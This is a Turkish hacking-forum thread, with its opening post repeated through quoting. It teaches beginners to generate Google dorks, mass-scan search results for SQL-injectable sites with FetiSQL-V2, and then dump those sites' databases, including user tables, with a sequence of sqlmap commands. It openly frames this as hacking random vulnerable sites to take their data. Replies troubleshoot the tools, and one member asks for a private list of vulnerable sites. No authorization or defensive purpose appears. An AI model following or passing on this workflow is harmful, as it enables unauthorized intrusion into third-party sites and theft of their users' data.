Root olarak dene veya terminal yerine toolun dosyasını bul ordan değiştirBEYLER BEN FETISQL/FILES/DORKS.TXT DOSYASINA DORKLARI KAYD EDIYORUM AMA ONLY READ DIYOR YANI KAYD EDEMIYORUM NE YAPMALIYIM
Root olarak dene veya terminal yerine toolun dosyasını bul ordan değiştirBEYLER BEN FETISQL/FILES/DORKS.TXT DOSYASINA DORKLARI KAYD EDIYORUM AMA ONLY READ DIYOR YANI KAYD EDEMIYORUM NE YAPMALIYIM
Tarama yapmadan doğrulama veriyorsa lütfen modeminizi yeniden başlatın ip adresinizle ilgili sorun oluyordur bendede olmuştu ama modemi kapatıp açtıktan sonra düzeldiknk sürekli onaylama çıkıyor googel taramada her tarmasında ?
denicemTarama yapmadan doğrulama veriyorsa lütfen modeminizi yeniden başlatın ip adresinizle ilgili sorun oluyordur bendede olmuştu ama modemi kapatıp açtıktan sonra düzeldi
her seferinde modemi resetlicem knk ben böyleTarama yapmadan doğrulama veriyorsa lütfen modeminizi yeniden başlatın ip adresinizle ilgili sorun oluyordur bendede olmuştu ama modemi kapatıp açtıktan sonra düzeldi
Hayır sadece tek seferliğe mahsus bir durum bu bende de öyle olmuştu aç kapa yaptım bir dahada hiçbir şekilde olmadıher seferinde modemi resetlicem knk ben böyle
Xss öğrendikten sonra neden olmasınÇok güzel çalışma olmuş xss için de aynısını bekliyoruz
knk aç kapa yaptım yine aynı şeye dönüyor taratıyor geçiyorum hop tekrar geliyor 3 defa modem resetledimHayır sadece tek seferliğe mahsus bir durum bu bende de öyle olmuştu aç kapa yaptım bir dahada hiçbir şekilde olmadı
@Enistein hocanın konusunun altında yazım size cevap verecektir bende sadece bir kere oldu ve sağolsun yardımcı oldu kendisi bana.knk aç kapa yaptım yine aynı şeye dönüyor taratıyor geçiyorum hop tekrar geliyor 3 defa modem resetledim
düzeltim knkim programda bi buglanma oldu onu düzeltim sorun yok şuan@Enistein hocanın konusunun altında yazım size cevap verecektir bende sadece bir kere oldu ve sağolsun yardımcı oldu kendisi bana.
linuxta nbaşladıysan knk temele gir direkYeni başladım nasıl bir yol izlemeliyim
Bence bir programlama dili öğrenerek başla python olabilir mesela ordan kendine tool yazabilirsin veya bir kaç eğitim serisi bulup temel olarak geliştirebilirsin kendini hacking alanındaYeni başladım nasıl bir yol izlemeliyim
dost ben fetisql ile 2 ye basıyorum bana web site yok diyor@Enistein hocanın konusunun altında yazım size cevap verecektir bende sadece bir kere oldu ve sağolsun yardımcı oldu kendisi bana.
dork tara diyorum firefox üstünden kendi kendine bir şeyler yapıyor.Öncellikle siz değerli forum üyemizi/yöneticimizi burda görmekten mutluluk duyuyorum
Bugünki konumda dork oluşturup oluşturduğumuz dorkları tarayıp sql açıklı siteler bulup o sitelerden bir tanesini birlikte hackliyelim ne dersiniz ?
Konunun Temel Amacı Ne ?
Bu konuyu açmamdaki temel amaç web hacking başlıyacak olan arkadaşlara bir nebze bile olsun yol göstermek kafalarında bir fikir oluşturmak
Konunun Sonunda Ne Elde Edeceksiniz ?
Bu konu sonunda temel olarak dork oluşturabilecek, dorkları taratıp sql açıklı site tespit edip bu zaafiyetli sitelerden gerekli verileri ele geçirebileceksiniz
Herhangi bir sorunuz olursa lütfen konu altında belirtiniz
Başlıyalım
1- Dork (Google Dorks) Oluşturma
Nedir Bu Google Dork ?
Google dork, özel anahtar kelimeler veya operatörler kullanarak Google'da arama yapmak için kullanılan bir terimdir. Google dorkları, arama sonuçlarında belirli türdeki bilgileri, hassas bilgileri veya güvenlik açıklarını ortaya çıkarmak için kullanılabilir. Bazı yaygın kullanılan Google dorkları şunlardır:
site: belirli bir web sitesinde arama yapmak için kullanılır inurl: URL'lerin belirli bir kelimeyi içermesini sağlar intitle: belirli bir başlığı olan sayfaları listeler filetype: belirli bir dosya türünü arar (pdf, doc, xls vb.) link: belirli bir URL'ye bağlantı veren sayfaları listeler
Otomatik Olarak Zaafiyetli Google Dork Oluşturma
Ben şahsım adına dork oluşturmak için bizzat emek vererek @Mentalistler hocanın biz forum üyeleri için oluşturmuş olduğu Dork Studio toolunu kullanacağım siz başka toolarda kullanabilirsiniz
İlk olarak toolumuzu Githubtan git clone yaparak indirmemiz gerekir bunun için terminalimize
Kod:git clone https://github.com/mentalistler/Dork-Studio.git
yazıyoruz sonrasında ise sırasıyla
Kod:cd Dork-Studio/
Kod:python -m pip install -r requirements.txt
yaptıktan sonra toolu çalıştırmak için
Kod:python manage.py runserver
ve tarafımıza böyle bir çıktı verecektir
şimdi ise tarayıcımızın url kısmına http://localhost:8000 yazıyoruz Karşımıza böyle bir arayüz gelecek
burda ilk olarak oluşturmak istediğimiz dork türünü seçiyoruz daha sonra ise wordlist seçelim ve istediğimiz herhangi bir ülke varsa onuda seçip devam et (Next) diyoruz daha sonraki ekranımız bu şekilde olacaktır
Burda üretmek istediğiniz dork sayısını giriniz daha sonrasında eğerki wordlist seçtiyseniz herhangi bir karakter sayısı girmenize gerek yok karşımıza vereceği çıktı bu şekilde olacaktır
Burdan txt görünümünü seçip kopyalıyoruz şimdi ise 2.toolumuz olan dork tarama ve sql açıklı site bulmak için biz forum üyeleri için bizzat @Mentalistler
tarafından yapılmış bit tool olan fetisql v2 kullanacağız bunun için ilk olarak sırasıyla
Kod:git clone https://github.com/mentalistler/FetiSQL-V2.git cd FetiSQL-V2 pip install -r requirements.txt python main.py
Açılan menüde ilk olarak dork taratacağımız için ilk önce FetiSQL-V2 klasorüne gelip files/dorks.txt içine kopyaladığımız (oluşturduğumuz) dorkları yapıştırıyoruz kaydedip çıktıktan sonra terminalden FetiSQL-V2 çalıştırıyoruz
SQL açık kontrolü
Bunun için ekstra bir tool kurmamıza gerek yok zaten bu FetiSQL-V2 de mevcut bunun için menüden 2 diyip devam ediyoruz. Eğerki siz başka bir tooldan tarattıysanız dorklarınızı bulunan result dosyasını result/result.txt içine kaydediniz.işlem sonucunda açık olan siteleri bizler için böyle tek tek kaydedecektir.
Veri Çekme Nasıl Yapılır ?
Öncellikle FetiSQL-V2 toolumuzun bize verdiği açıklı siteler result/sql.txt içine kaydediliyor ordaki açıklı site linkini kopyalayıp yeni bir terminalde
Kod:sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --dbs
(çıktımız buna benzer olacaktır)
yapıp sitenin içinde barındırdığı database isimlerinini buluyoruz. (unutmadan eklemek istiyorum bu adımlarda y/n gibi sorular soruyor bazen bunlar c/s/q olabiliyor bu durumda sqlmap size önerdiğini büyük harfle gösterecektir Y/n gibi) Sonra ise
Kod:sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --current-db
yazıp hedef açıklı sitede aktif olarak kullanılan database ismini alıyoruz çıktımız bu sekilde olacaktır.
şimdi ise database içinde bulunan tabloları görüntüliyelim bunun için
Kod:sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --tables -D current db sonucumuzu yazıyoruz
çıktımız bu şekilde olacaktır burda tablo isimlerimizden az çok içinde hangi tür veriler bulunduğunu tahmin edebiliyoruz mesela benim örnekte önemli veriler kubrc_users ta olduğunu düşünüyorum şimdi ise bakalım seçtiğimiz tablonun içinde neler mevcutmuş bunun için
Kod:sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --columns -T seçtiğimiz tablo ismi -D current db ismi
çıktımız buna benziyecek peki burda neler olduğunu gördük ve önemli bilgiler mevcut nasıl içeriğine bakacaz derseniz bunun için
Kod:sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --columns -T seçtiğimiz tablo ismi -D current db ismi --dump
ve en son olarak bize verilerin nereye kaydedildiğini gösterir dosya yolunu kopyalayıp erişebilirsiniz
Önemli Bilgilendirmeler
1- Bazen veriler şifrelenmiş olarak gelebilir bunların terimsel isimlerine hash diyoruz bunları kırmak bazen zahmetli olabiliyor ancak kırılmayacak herhangi bir şifre yoktur.
2- @Mentalistler hoccanın tooları oldukça iyi daha detaylı bilgi için
3- FetiSQL-V2 konu linki FetiSQL-V2
4- Dork-Studio konu linki Dork-Studio
5- SQL ile herhangi bir bilginiz yok ise Web Hacking Giriş
6- hashları kırmak için Pass The Hash Saldırısı
Umarım Faydalı Olabilmişimdir
Evet dorks.txt içi deki dorkları kendisi tarayıp bulduğu siteleri results.txt ye kaydediyor bu normaldork tara diyorum firefox üstünden kendi kendine bir şeyler yapıyor.
Önce dork ları taratman gerek dorkları tarattıktan sonra daha yeni 2. Seçeneği seçip results.txt içindeki siteleri tek tek kontrol edip sql açığı olan siteleri gösterecekdost ben fetisql ile 2 ye basıyorum bana web site yok diyor
arattığımda sql açıklı site bulamıyor ama. results 0Evet dorks.txt içi deki dorkları kendisi tarayıp bulduğu siteleri results.txt ye kaydediyor bu normal
Önce dork ları taratman gerek dorkları tarattıktan sonra daha yeni 2. Seçeneği seçip results.txt içindeki siteleri tek tek kontrol edip sql açığı olan siteleri gösterecek
Yeni dorklar oluşturun ve sayıyı biraz fazla tutun dorklarıda konuda bahsettiğim tool ile dork oluşturunarattığımda sql açıklı site bulamıyor ama. results 0
bana özelden açıklı bir kaç site atar mısın deneme yapacağım. sabırsızlanıyorumYeni dorklar oluşturun ve sayıyı biraz fazla tutun dorklarıda konuda bahsettiğim tool ile dork oluşturun
Veya yeni bir wordlist ekleyip öyle taratın
Malesef şu anda teknik aksaklıklar yüzünden internet bağlantım bulunmamaktabana özelden açıklı bir kaç site atar mısın deneme yapacağım. sabırsızlanıyorum
hocam çok sağolun fakat results/sql.txt kaydedildi! dedikten sonra txt dosyasının içine girdiğimde bomboş gözüküyor ne yapmam gerek bunun içinÖncellikle siz değerli forum üyemizi/yöneticimizi burda görmekten mutluluk duyuyorum
Bugünki konumda dork oluşturup oluşturduğumuz dorkları tarayıp sql açıklı siteler bulup o sitelerden bir tanesini birlikte hackliyelim ne dersiniz ?
Konunun Temel Amacı Ne ?
Bu konuyu açmamdaki temel amaç web hacking başlıyacak olan arkadaşlara bir nebze bile olsun yol göstermek kafalarında bir fikir oluşturmak
Konunun Sonunda Ne Elde Edeceksiniz ?
Bu konu sonunda temel olarak dork oluşturabilecek, dorkları taratıp sql açıklı site tespit edip bu zaafiyetli sitelerden gerekli verileri ele geçirebileceksiniz
Herhangi bir sorunuz olursa lütfen konu altında belirtiniz
Başlıyalım
1- Dork (Google Dorks) Oluşturma
Nedir Bu Google Dork ?
Google dork, özel anahtar kelimeler veya operatörler kullanarak Google'da arama yapmak için kullanılan bir terimdir. Google dorkları, arama sonuçlarında belirli türdeki bilgileri, hassas bilgileri veya güvenlik açıklarını ortaya çıkarmak için kullanılabilir. Bazı yaygın kullanılan Google dorkları şunlardır:
site: belirli bir web sitesinde arama yapmak için kullanılır inurl: URL'lerin belirli bir kelimeyi içermesini sağlar intitle: belirli bir başlığı olan sayfaları listeler filetype: belirli bir dosya türünü arar (pdf, doc, xls vb.) link: belirli bir URL'ye bağlantı veren sayfaları listeler
Otomatik Olarak Zaafiyetli Google Dork Oluşturma
Ben şahsım adına dork oluşturmak için bizzat emek vererek @Mentalistler hocanın biz forum üyeleri için oluşturmuş olduğu Dork Studio toolunu kullanacağım siz başka toolarda kullanabilirsiniz
İlk olarak toolumuzu Githubtan git clone yaparak indirmemiz gerekir bunun için terminalimize
Kod:git clone https://github.com/mentalistler/Dork-Studio.git
yazıyoruz sonrasında ise sırasıyla
Kod:cd Dork-Studio/
Kod:python -m pip install -r requirements.txt
yaptıktan sonra toolu çalıştırmak için
Kod:python manage.py runserver
ve tarafımıza böyle bir çıktı verecektir
şimdi ise tarayıcımızın url kısmına http://localhost:8000 yazıyoruz Karşımıza böyle bir arayüz gelecek
burda ilk olarak oluşturmak istediğimiz dork türünü seçiyoruz daha sonra ise wordlist seçelim ve istediğimiz herhangi bir ülke varsa onuda seçip devam et (Next) diyoruz daha sonraki ekranımız bu şekilde olacaktır
Burda üretmek istediğiniz dork sayısını giriniz daha sonrasında eğerki wordlist seçtiyseniz herhangi bir karakter sayısı girmenize gerek yok karşımıza vereceği çıktı bu şekilde olacaktır
Burdan txt görünümünü seçip kopyalıyoruz şimdi ise 2.toolumuz olan dork tarama ve sql açıklı site bulmak için biz forum üyeleri için bizzat @Mentalistler
tarafından yapılmış bit tool olan fetisql v2 kullanacağız bunun için ilk olarak sırasıyla
Kod:git clone https://github.com/mentalistler/FetiSQL-V2.git cd FetiSQL-V2 pip install -r requirements.txt python main.py
Açılan menüde ilk olarak dork taratacağımız için ilk önce FetiSQL-V2 klasorüne gelip files/dorks.txt içine kopyaladığımız (oluşturduğumuz) dorkları yapıştırıyoruz kaydedip çıktıktan sonra terminalden FetiSQL-V2 çalıştırıyoruz
SQL açık kontrolü
Bunun için ekstra bir tool kurmamıza gerek yok zaten bu FetiSQL-V2 de mevcut bunun için menüden 2 diyip devam ediyoruz. Eğerki siz başka bir tooldan tarattıysanız dorklarınızı bulunan result dosyasını result/result.txt içine kaydediniz.işlem sonucunda açık olan siteleri bizler için böyle tek tek kaydedecektir.
Veri Çekme Nasıl Yapılır ?
Öncellikle FetiSQL-V2 toolumuzun bize verdiği açıklı siteler result/sql.txt içine kaydediliyor ordaki açıklı site linkini kopyalayıp yeni bir terminalde
Kod:sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --dbs
(çıktımız buna benzer olacaktır)
yapıp sitenin içinde barındırdığı database isimlerinini buluyoruz. (unutmadan eklemek istiyorum bu adımlarda y/n gibi sorular soruyor bazen bunlar c/s/q olabiliyor bu durumda sqlmap size önerdiğini büyük harfle gösterecektir Y/n gibi) Sonra ise
Kod:sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --current-db
yazıp hedef açıklı sitede aktif olarak kullanılan database ismini alıyoruz çıktımız bu sekilde olacaktır.
şimdi ise database içinde bulunan tabloları görüntüliyelim bunun için
Kod:sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --tables -D current db sonucumuzu yazıyoruz
çıktımız bu şekilde olacaktır burda tablo isimlerimizden az çok içinde hangi tür veriler bulunduğunu tahmin edebiliyoruz mesela benim örnekte önemli veriler kubrc_users ta olduğunu düşünüyorum şimdi ise bakalım seçtiğimiz tablonun içinde neler mevcutmuş bunun için
Kod:sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --columns -T seçtiğimiz tablo ismi -D current db ismi
çıktımız buna benziyecek peki burda neler olduğunu gördük ve önemli bilgiler mevcut nasıl içeriğine bakacaz derseniz bunun için
Kod:sqlmap -u https://hedefsite.uzantı/book.php?id=1538 --columns -T seçtiğimiz tablo ismi -D current db ismi --dump
ve en son olarak bize verilerin nereye kaydedildiğini gösterir dosya yolunu kopyalayıp erişebilirsiniz
Önemli Bilgilendirmeler
1- Bazen veriler şifrelenmiş olarak gelebilir bunların terimsel isimlerine hash diyoruz bunları kırmak bazen zahmetli olabiliyor ancak kırılmayacak herhangi bir şifre yoktur.
2- @Mentalistler hoccanın tooları oldukça iyi daha detaylı bilgi için
3- FetiSQL-V2 konu linki FetiSQL-V2
4- Dork-Studio konu linki Dork-Studio
5- SQL ile herhangi bir bilginiz yok ise Web Hacking Giriş
6- hashları kırmak için Pass The Hash Saldırısı
Umarım Faydalı Olabilmişimdir
Sql açıklı site bulamamış olabilirhocam çok sağolun fakat results/sql.txt kaydedildi! dedikten sonra txt dosyasının içine girdiğimde bomboş gözüküyor ne yapmam gerek bunun için
Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.